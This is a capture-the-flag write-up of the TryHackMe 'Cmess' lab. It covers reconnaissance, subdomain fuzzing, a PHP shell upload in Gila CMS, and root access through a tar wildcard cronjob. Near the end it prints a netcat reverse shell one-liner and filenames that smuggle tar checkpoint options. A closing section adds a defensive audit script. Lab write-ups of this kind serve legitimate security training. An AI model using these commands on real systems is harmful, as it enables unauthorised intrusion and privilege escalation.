CTF-Writeups/TryHackMe/Cmess.md
2020-12-12 21:18:11 +05:00


TryHackMe-Cmess

First of all, add the IP given in the room to /etc/hosts with the domain cmess.thm.

NMAP

Nmap scan report for cmess.thm (10.10.212.255)
Host is up (0.42s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d9:b6:52:d3:93:9a:38:50:b4:23:3b:fd:21:0c:05:1f (RSA)
|   256 21:c3:6e:31:8b:85:22:8a:6d:72:86:8f:ae:64:66:2b (ECDSA)
|_  256 5b:b9:75:78:05:d7:ec:43:30:96:17:ff:c6:a8:6c:ed (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Gila CMS
| http-robots.txt: 3 disallowed entries 
|_/src/ /themes/ /lib/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.41 seconds

We have ports 22 and 80 open, so let's see what's on the web page.

PORT 80

It is a CMS with a simple page and nothing much on it. The Nmap scan showed us that there are 3 entries in robots.txt, so let's see what we can find.

So there are three entries there.

But we don't have permission to access those paths, so the only option we have right now is to fuzz for directories.

Running gobuster didn't help us much: we only got a login page, which is useful, but as we don't have the creds yet we can't do anything with it. Looking at the hint given in the room, it says "Have you tried fuzzing subdomains?". So I decided to go for wfuzz, which is a really awesome tool if you want to fuzz for parameters and subdomains.

So before using tools to fuzz for subdomains, what does a subdomain look like?

A subdomain is a part of a domain that you own. For example, in this case we have the domain http://cmess.thm; its subdomains would look like http://blog.cmess.thm or http://support.cmess.thm, so this will be our pattern for subdomains. Now let's start fuzzing for subdomains.

Here I am using SecLists, which has a collection of wordlists. It gives us a bunch of subdomains with the same length (107 L); we don't want those, so let's remove them with --hl 107, which hides responses with that length. We can do the same thing with characters, words and status codes, so it's really handy to know.

Now, running it with the filter, we find a subdomain. Perfect.

Visiting it, we find a conversation between a user and the support team which gives us a password to log in to the page we found on Gila CMS.

With that username and password we are logged in; the page also tells us the CMS version it is using, 1.10.9.

After we have logged in, go to Content > File Manager.

And upload your PHP shell.

Access that file via the domain name.

We will see a cronjob running on the system.

This is creating an archive of the backup folder in andre's home directory. We can't really do anything unless we can write to andre's directory, so let's run linpeas to find anything juicy. To do that, first transfer linpeas to the target box via netcat or a Python HTTP server.

On running linpeas I found a password file.

After logging in and grabbing the user flag, navigate to /home/andre/backup, run these commands, and then wait a minute for the cronjob to trigger:

echo "mkfifo /tmp/lhennp; nc 10.2.54.209 8888 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

And we are root !!!
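The root step above works because the cronjob lets the shell expand a wildcard into tar's arguments, so a filename that starts with "--" is parsed as an option. As an added example that is not part of the original writeup, here is a small POSIX sh audit that flags such option-like filenames in a backup directory, plus the hardened tar invocation (archiving the directory itself instead of a wildcard) that closes the hole. The function names and the use of GNU tar are assumptions.

```shell
#!/bin/sh
# Added example (not from the writeup): check a directory that a cron-driven
# "tar czf backup.tgz *" reads from for filenames that wildcard expansion
# would hand to tar as options, and show a tar call that is not affected.
# Assumes POSIX sh and GNU tar; the function names are illustrative.

# Prints every entry whose name begins with "-" and returns 1 if any exist,
# 0 if the directory is clean. Dotfiles are included because "*" on its own
# would skip them but an attacker-chosen name might still start with "-".
audit_backup_dir() {
    dir=$1
    found=0
    for f in "$dir"/* "$dir"/.[!.]* "$dir"/..?*; do
        [ -e "$f" ] || continue            # skip unmatched glob patterns
        case ${f##*/} in
            -*) printf 'option-like filename: %s\n' "$f"; found=1 ;;
        esac
    done
    return $found
}

# Hardened backup: archive the directory itself rather than expanding "*",
# so a file named "--checkpoint-action=exec=..." is only data inside the
# tarball and never reaches tar's option parser.
safe_backup() {
    dir=$1
    out=$2
    tar czf "$out" -C "$dir" .
}
```

Run audit_backup_dir against the backup directory from the cron job: a non-zero exit tells you someone has planted option-like filenames, which is the indicator a defender should alert on.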